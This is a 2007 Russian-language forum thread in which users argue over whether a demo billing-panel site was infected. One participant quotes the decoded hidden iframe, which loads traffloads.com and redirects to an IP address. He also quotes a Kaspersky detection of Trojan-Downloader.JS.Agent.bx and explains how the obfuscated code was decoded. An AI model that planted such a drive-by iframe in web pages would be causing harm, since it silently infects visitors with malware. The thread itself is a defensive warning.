|
_Гаврила_ че ты [Вырезано Цензурой] Обьясни наконец!
Гмм....Гаврила....ГаврЫлкО обьясни мине че ты пристал с той темой про билинг панель?Там ничего нету.....ну че ты там умудрился найти!Можешь для меня туподоходящей в качестве исключения обьяснить??
Чессно говоря...а то уже запарило это :confused: :mad: *****(22:33:43 28/01/2007) Тему удалили как я понял и я его не увидел. И передай урсуле, что она возможно уже чей-то бот Ну и ты тоже, если ходил по той ссылке и ничего подозрительного не заметил. *****(22:34:17 28/01/2007) Это гаврила написал И обьясни от куда ты нарыл _______________________________ ****** (23:07:35 28/01/2007) На самом деле в раскодированном виде выглядит это так <IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME> Потом перекидывает сюда http://81.95.146.241/ss21mk2/index.php Ах да Вот письмо от дяди Жени Здравствуйте. 1) На сайте обнаружен зловред (Trojan-Downloader.JS.Agent.bx) 2) На сайте были также недетектируемые нами зловреды - могут возникнуть проблемы. Благодарим за оказанную помощь. --------- С уважением, Юрий Несмачный Вирусный аналитик ЗАО "Лаборатория Касперского" _____________________ Вопрос: позволь узнать как ты раскодировал? |
Вот это и называеца параноя.
|
Мне отсюда инетересно чем он сделал декод....
|
Sandjuro
незнаю....незнаю.. Просто пусть мне предоставит факты! |
Цитата:
просто день идет, а я все жив. |
а через пм или асю никак нельзя у него это узнать ? тему я удалю
|
Ксан.не трогай тему.Нужен глаС народа
|
Итак обратившись в Лаб Касперского,вот что выдало:
Trojan-Downloader.JS.Agent.bx Детектирование добавлено 11 дек 2006 01:09 MSK Обновление выпущено 11 дек 2006 03:08 MSK Поведение Trojan-Downloader, троянский загрузчик У данной программы пока нет описания. Поскольку многие программы являются незначительными модификациями своих предыдущих версий, вам могут помочь описания других версий той же программы — если они есть, то ссылки на них приведены сразу под заголовком страницы. Чтож....теперь вопрос....от куда ты взял его?И ту переходную ссылку? RemaerD Спасибо... |
Цитата:
И как попала моя переписка с Ремаёрдом тебе??? Скорее этот вопрос нужно задать Ремаёрду.. Я не собираюсь обьяснять чем делать декод, это знает каждый школьник. Цитата:
Ремаёрд знает что я ему написал в пм для того чтобы он отредактировал свой пост, либо обьяснился. Урсула сбавь обороты. Подслушивать (подглядывать) чужие разговоры неприлично. p.s. Не надо писать мне в пм. Я не даю уроков кодирования ссылок =) |
ГАвря,не вижу ничего такого что нельзя выкладывать из нашего с тобой ПМ... Вобщем я остаюсь на своем мнении...
УРС ЧмогЕ |
Цитата:
Блин ну ты понимаешь....я незнаю как декод делается твоими методами :confused: туплю! :( Может все таки обьясниш как ты его зделал..в результати чего ты такие космические даные получил? Цитата:
А в пм я тебе написала...ну чтоб не заснул+) |
RemaerD чмоГ:-*
|
Цитата:
http://ha.ckers.org/xss.html Отмотаешь страницу вниз, вставишь код в графу HTML (with semicolons): Нажмёш кнопку Decode под этой строкой. Вверху увидишь читаемый текст. Написал подробно, чтоб ты не спросила опять что-нибудь =) Ну на каую кнопку жать или типа того. PHP код:
А вообще можно просто сохранить код в .html и открыть файл. Но мне казалось что ремаёрд имея такую репу должен знать об этом. Странно что он тебе не обьяснил это. Ну вы тут полобыбзайтесь, почмокайтесь, а мне честно говоря не хочется обсуждать более это всё. ======== Ах, ну я понял, репы то у вас типа превед +10. Тогда понятно =) |
Цитата:
Цитата:
======== Цитата:
|
Короче Гаврила...все эти кода и ссылки да ..замечательно...просто отлично!
Но все же вопрос остается....а фактов так и нет....хмм...каким же макаром ты определил и подумал что там вирус...которого нет? бред какойто!вернее не вирус...а троян.. |
Мда...я читал но даже не понял о чем тут речь..жаль у меня не так много времени сидеть на ачате...может тогда бы и смог понять о чем речь в этой теме.
|
Насколько я понял урсула прошла по какой-то вредной ссылке и ее комп превратился в бота...а Гаврила эту ссылку раскодировал полностью? Как сложен этот мир...
|
Дрэгги
Просто я давала ссылку на демо-версию билинг-панели...тогда нужны были програмеры..и для нагладного примера дала ссылку на сайт!Гаврила сказал мол там Трояны...и т.д и т.п. Я смотрела ифреймы и основной код....ничего там нету подозрительного!Там был обычный ифрейм с загрузчиком..он утверждает,что там трояны....но их там нету....=\ я сама ниче не понимаю...из того,что он говорит! |
Цитата:
Звучит как - да подумаешь, тебе троян установился. Делов то! =)))) ... p.s. участникам темы читать что такое довнлоадер и нафига его вообще используют (для чего) |
Цитата:
мой комп не превратился в бота!это ИМХо и зловредной ссылки тоже не было! пЫсЫ:я боюсь если выложу кода...то будут возражения...мол вирусы вылаживаю! Гаврила как раз утверждает что что ботов эта херь собирала для доссов |
Цитата:
Просто - собирала ботов. Возможно для доса, может еще для чего. Цитата:
Просто с Гаврилой я по ПМ много общался и всякую хреновину он гнать уж точно не будет. |
блин ну не прально выразилась значит.
там файл ....там есть ссылка на скачивание архива этой билинг панели(демо-версии) |
censored!
ок.щас в пм пришлю....а то чесно говоря я уже запуталась!=\ |
Цитата:
Закинь ссылку в ПМ - я завтра посмотрю чего там. |
censored!
Там такое пм-ище......токо не пугайся!Я там все выписала...чтоб было тебе понятнее! И прочти все!! |
Цитата:
Цитата:
|
ифрейм открывает удаленную страницу с которой пытается загрузить тебе троян и запустить его. Если ты шаришся в инете с дырявым ослом, тогда есть шансы что тебе этот троян закинут и хз что потом с тобой будет. Лучше не будет точно. Вот и все.
|
Цитата:
Гаврила говорил что не стоит заходить и т.д и т.п.... Но там ничего...никаких троянов....ботов...и прочего не было!!! Я смотрела и код самой страницы и за ифрейм смотрела.все было нормал. вот и архив этой панели, в нём есть файл типа header.inc.php, как я понимаю в нём прописывается сервер. http://******xpanel.rar Короче хелп ми.....крыша скоро окончательно уедет!!я разбиралась...и смотрела уже по 100 раз...ну не понимаю....ну нету там ниче :confused: |
Цитата:
......все....крыша уехала и мозги тоже!!АААА!!! щас от переизбытка инфы и замешательств взрыв будет!!!! |
Так, что конкретно не понятно? Так твоя крыша далеко не уедет....
|
Цитата:
Лично для меня ничего не свидетельствует о том что _ссылка небезопасная_ "что она возможно уже чей-то бот =) Ну и ты тоже, если ходил по той ссылке и ничего подозрительного не заметил."(с)Гаврила :confused: :confused: :confused: |
Цитата:
А вот читая твой пост у меня реально крыша едет так как я в таких сложных вещах не разбираюсь.. Цитата:
Цитата:
А тут у меня уже из глаз звездочки посыпались от обилия информации. |
Через эту ссылку грузят троянов. Если ты подцепила этого трояна то ты можеш стать чьим нибудь ботом. Например для ддоса. Еще раз через эту ссылку грузят троянов. Ясно? Как они это работает это уже другой вопрос.
|
2Дрэгги, закодированы зендом - значит что скрипт не запустится абы где. Только на одном серваке. А ей нужно что бы он запускался везде. Для этого нужно зенд расшифровать. Чего вы все непонятливые такие.
|
а что значит файлы и архив закодированы зендом??? Да и слова Zeoshost и билинг-панель для меня мало что говорят...
Цитата:
|
а все понял про зенд...а про зеосхост и билинг панель еще не дошло:)
|
blaga
Через какую именно ссылку грузят трояна?? Ну не может этого быть!!!Ведь там ссылка была для загрузки демо-версии самой панели!!!А не трояна! Или я туплю...или незнаю....=\ |
Дрэгги
зеосхост - это __ http://zeoshost.ru/ =))))) |
Цитата:
|
blaga
Ну так!!Не было ведь этой ссылки!!Этого ифрейма!! ___*разум начал прояснятся*___ Было вот: <IFRAME src="ht........и т.д и т.п(куча знаков)))" width=5 height=5 style="display:none"></IFRAME> |
| Время: 17:19 |